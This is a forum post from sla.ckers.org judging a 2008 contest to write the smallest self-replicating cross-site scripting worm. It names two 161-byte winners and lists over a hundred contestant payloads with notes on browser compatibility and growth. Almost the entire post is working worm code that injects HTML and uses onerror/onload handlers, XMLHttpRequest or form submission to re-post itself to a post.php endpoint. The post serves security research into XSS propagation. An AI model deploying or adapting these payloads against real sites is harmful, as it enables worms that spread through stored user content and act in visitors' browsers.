Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 19 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:08PM

Okay, Geez, this was a nightmare to test - but it looks like we do have a winner, but it's probably not what you think. Almost every one of these vectors failed to work in IE7.0 (if they worked at all). A huge percentage broke various rules, or grew even if they did work. Lots didn't work on pages with no other content. Others double encoded, or sent the wrong encoding in Firefox via XMLHttpRequest (lots of those, actually). So instead of just checking one or two, I actually had to check all of them to see what happened, which ended up taking a looot longer. I had to make a few judgment calls since I was seeing the same things over and over again, but you should be able to see for yourself if you have any specific questions.

Weirdly enough, we had a two way tie (as far as I can tell because there was so much noise in this thread). It's made equally complex by the fact that the vectors are almost identical. So the winners are *drumroll* ma1's vector and sirdarckcat's vector:

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

and

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

Both were a stunningly small 161 bytes! Congrats to both of the guys and a huge round of applause to everyone who submitted results. I was completely shocked by the results, as I thought we'd land at a much smaller number, but I think that was muddied by the fact that many people couldn't test their code in IE7.0.

And for those who want to see how the rest of the results panned out here are the judge results (feel free to contest them - it was a ton of work going through them so I _may_ have made errors):


spyware - 136 Doesn't work in Firefox 2.0.0.11
ý<form onFocus="submit(alert('xss'))"><input onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe onLoad="parentNode.focus()">ó


gareth - 162 Doesn't work in Firefox 2.0.0.11
<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">


digi7al64 (via gareth) - 144 Doesn't work in Firefox 2.0.0.11
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>


doctordan - 154 Doesn't work in Firefox 2.0.0.11
„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


ma1 - 165 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">


.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


Ronald - 147 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 149 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">


Gareth - 148 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;


Ronald - 198 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


Ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 142 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>


ma1 - 201 Doesn't work in Firefox 2.0.0.11 on second iteration)
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"


gareth - 209 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


Ronald - 203 Works on FF and IE!!! (does change order around, but no growth):
<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Turns into (also 203 chars):
<B><IMG onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))" src=""></B>


ma1 - 132 Doesn't work in Firefox 2.0.0.11 as written
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"


ma1 - 140 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"


ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"


gareth - 188 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">


gareth - 209 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


matt presson (via gareth) - 140 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">


gareth - 128 Missing payload
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">


digi7al64 - 140 Doesn't work in Firefox 2.0.0.11
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>


glacialphoenix (via digi7al64) - 226 Doesn't work in Firefox 2.0.0.11
<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>


doctordan - 133 Invalid as parens may exist elsewhere on the page
{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B


digi7al64 - 133 Doesn't work in Firefox 2.0.0.11
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>


digi7al64 - 134 IE only
<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>


digi7al64 - 111 IE only
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>


badsamaritan - 168 Works in FF but grows
<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>


gareth - 146 Works in FF but grows
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"


gareth - 153 Works in FF with no growth but doesn't work in IE7.0
<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">


ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


gareth - 204 Works in FF with no growth but doesn't work in IE7.0
_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>


ronald - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


gareth - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">


doctordan - 139 Invalid as parens may exist elsewhere on the page
{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9


doctordan (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">


gareth - 142 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">


doctordan (via ronald) - 130 Doesn't work in Firefox 2.0.0.11
<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b


doctordan (via ronald) - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


matt presson (via backstorm/ronald) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>


backstorm - 125 Doesn't work in Firefox 2.0.0.11
<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>


matt presson (via backstorm) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 131 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>



sdc - 154 (via ma1/.mario) Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


.mario (via ma1) - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


ma1 - 155 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


.mario - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


.mario - 134 Doesn't work in Firefox 2.0.0.11
<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>


ronald - 130 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 135 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>


bwb labs - 251 - Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>


matt presson - 128 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>


gareth - 156 Doesn't work in Firefox 2.0.0.11
<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

ronald - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

spyware - 173 Doesn't work in Firefox 2.0.0.11
<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>


spyware - 157 Doesn't work in Firefox 2.0.0.11
<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>


spyware - 146 Doesn't work in Firefox 2.0.0.11
<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">


gareth - 206 Doesn't work in Firefox 2.0.0.11
<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>


ronald - 136 Breaks DOM knowledge rule
<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">


beni (via ronald) - 131 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>


ronald - 111 Doesn't work in Firefox 2.0.0.11 and grows
<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">


ronald - 174 Grows
<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">


gareth - 192 Uses the onload event handler which may already be assigned
<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"


mario (via beni) - 177 Works in FF but breaks in IE7.0 on second iteration
<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>


beni - 171 Works in FF but breaks in IE7.0 on second iteration
<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>


gareth - 175 Doesn't work in Firefox 2.0.0.11
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


gareth - 153 Breaks DOM knowledge rule
<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>


gareth - 147 Breaks DOM knowledge rule
<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"


gareth - 175 Breaks DOM knowledge rule
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


ronald - 185 Breaks DOM knowledge rule
<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


.mario (via ronald) - 161 Breaks DOM knowledge rule
<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (doctype check) - 165 Breaks DOM knowledge rule
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (via kyran) - 185 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>

bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>


bwb labs - 255 Works in both FF and IE7.0!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


spikeman - 154 Grows
<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="


bwb labs (via dbloom) - 256 Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


.mario - 158 Doesn't work in Firefox 2.0.0.11
<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>


.mario - 159 Works in FF with no growth but doesn't work in IE7.0
<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"


kyran - 183 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>


sdc - 154 - Grows in FF
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=


sdc - 154 - Grows in FF (same as above)
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=

ma1 (via gareth) - Works in FF but grows and stops working in IE7.0
<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">


gareth - 154 Posts to the wrong page
<form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">


gareth - 160 Posts to the wrong page
<form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>


dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>


ma1 - 157 Breaks DOM knowledge rule
<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


doctordan - 158 Doesn't work in Firefox 2.0.0.11
<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


spyware - 141 Doesn't work in Firefox 2.0.0.11 if body content is present - so close!
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>


ma1 - 142 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>


ronald - 143 Doesn't work in Firefox 2.0.0.11
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


sdc (via ronald) 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined


sdc (via gareth) 169 Doesn't work in Firefox 2.0.0.11
<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">


gareth - 164 Posts to the wrong page
<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>


sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


.mario - 132 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>


.mario - 141 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>


ronald - 132 Doesn't work in Firefox 2.0.0.11
<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>


spyware - 129 Doesn't work in Firefox 2.0.0.11
ý<FORM action=post.php method=post><INPUT onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();" name=content></FORM>


spyware - 135 Doesn't work in Firefox 2.0.0.11
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>


mario (via ronald) - 142 Doesn't work in Firefox 2.0.0.11
<form id=m><input name="content"><script>with(m)m[0].value='<form id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>


ronald - 141 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


ronald - 145 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


ronald - 147 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content><script>_.content.value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


spikeman (via .mario) - 132 Requires user interaction
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario - 140 Requires user interaction
<form id=j><button onclick="j.action=j.method='post';value='<form id=j>'+j.innerHTML+'</form>';alert('XSS')" name="content"></button></form>


.mario - 136 Requires user interaction
<form><button onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)" name="content">


.mario - 125 Requires user interaction
<form id=i><button onclick="i.method=i.action='post',value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario (via all) - 125 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">


.mario - 126 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">


.mario - 171 Works in FF with no growth and works in IE and actually shrinks!!!
<b><img onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()" src="m"><form id="i" action="post" method="post"><input name="content"></form></b>


bwb labs - 271 Works in both FF with no growth and IE!!!
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>


barbarianbob (via ma1) - 127 Requires user interaction
<form<input name="content" onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">


spyware - 140 Requires user interaction
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>


hallvors - 150 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">


hallvors - 185 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">


shawn (via ma1) - 128 Requires user interaction
<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">


bwb labs - 266 Works in FF with no growth and IE!!!
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>



spyware - 134 Requires user interaction
ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>


ma1 - 129 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">


ma1 - 136 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">


spyware - 134 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc (via shawn) - 143 Doesn't work in Firefox 2.0.0.11
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


spyware - 151 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc - 150 Requires user interaction
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>


spyware - 137 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>


sdc - 164 Doesn't work in Firefox 2.0.0.11
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>



sdc - 141 Doesn't work in Firefox 2.0.0.11
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>


spyware - 122 Requires user interaction
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


amado - 140 Doesn't work in Firefox 2.0.0.11
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>


sdc - 155 Doesn't work in Firefox 2.0.0.11
<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>


ma1 - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">


dev80 - 159 Doesn't work in Firefox 2.0.0.11
